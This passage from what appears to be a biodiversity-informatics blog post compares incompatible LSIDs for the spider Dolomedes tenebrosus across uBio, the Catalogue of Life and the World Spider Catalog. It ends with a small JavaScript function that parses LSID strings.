urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)<br /><strong>The World Spider Catalog:</strong> urn:lsid:amnh.org:spidersp:019664<br /><br />The uBio and Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because, at the time of writing, the AMNH does not yet have a functioning resolution service.<br /><br />Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or persist under Darwinian market pressures? What I want is to store an LSID in my relational database so that I can more confidently link names with other sources of information, such as type specimens, gene sequences, synonyms, specimens, etc. The uBio LSID above is nice and compact, but no one but me and uBio would use it. <a href="http://www.amnh.org/science/divisions/invertzoo/bio.php?scientist=platnick">Norm Platnick</a> wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't use its object identifier as a stand-alone integer.<br /><br />So, I'll continue to use "<em>Dolomedes tenebrosus</em> Hentz, 1844", thank you very much. A decentralized identifier system is failing me.
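A closing footnote on the syntax diagram above: pulling an LSID apart is entirely mechanical, which makes the proliferation of authorities all the more frustrating. A minimal sketch in plain JavaScript (the field names in the returned object are mine):<br /><blockquote>// Split an LSID of the form urn:lsid:authority:namespace:object[:revision].<br />function parseLsid(lsid) {<br />var p = lsid.split(':');<br />if (p[0] !== 'urn' || p[1] !== 'lsid' || p.length < 5) {<br />throw new Error('Not an LSID: ' + lsid);<br />}<br />return { authority: p[2], namespace: p[3], object: p[4], revision: p[5] || null };<br />}<br /><br />parseLsid('urn:lsid:ubio.org:namebank:2072956');<br />// -> { authority: 'ubio.org', namespace: 'namebank', object: '2072956', revision: null }</blockquote>Run the three <em>Dolomedes tenebrosus</em> LSIDs above through this and you get three perfectly well-formed, mutually incompatible answers, which is precisely the problem.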